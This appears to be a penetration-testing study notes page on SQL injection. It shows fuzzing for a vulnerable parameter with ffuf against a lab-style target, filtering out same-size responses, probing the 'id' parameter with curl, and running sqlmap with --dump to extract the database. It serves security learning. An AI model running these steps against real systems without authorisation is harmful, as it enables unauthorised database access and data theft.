SQLI

this is the automated method of finding and exploiting SQLi

STEP 1: IDENTIFY THE VULNERABLE PARAMETER
root@oco:~$ find / -iname burp-param* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt . 

root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value'
 ...
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorpassword                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorurl                     [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [41/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorc                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [42/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorid                      [Status: 200, Size: 38, Words: 7, Lines: 1]
 :: Progress: [43/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Erroremail                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [44/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortype                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [45/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorusername                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [46/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorq                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [47/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortitle                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [48/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordata                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [49/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordescription             [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [50/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorfile                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [51/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errormode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [52/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [53/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errororder                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [54/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorcode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [55/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorlang                    [Status: 200, Size: 19, Words: 4, Lines: 1]

 * notice a similar response size in every request. This is because supplying any 
   parameter will return the same text, not an error like 404

#filter out any responses having a size of 19
root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value' -fs 19
 ...
 id                      [Status: 200, Size: 38, Words: 7, Lines: 1, Duration: 9ms]

 * the id parameter has... [Status: 200, Size: 38, Words: 7, Lines: 1]
   which means its a valid parameter

#provide a sample test
root@oco:~$ curl http://<TARGET IP>:3003/?id=1
 [{"id":"1","username":"admin","position":"1"}]
 
root@oco:~$ curl http://10.129.202.133:3003/?id=3
 [{"id":"3","username":"WebServices","position":"3"}]
root@oco:~$ which sqlmap
 ...
root@oco:~$ sqlmap -u 'http://10.129.202.133:3003/?id=1' --dump
PreviousOS EXPLOITATIONNextCMD INJECTION

Last updated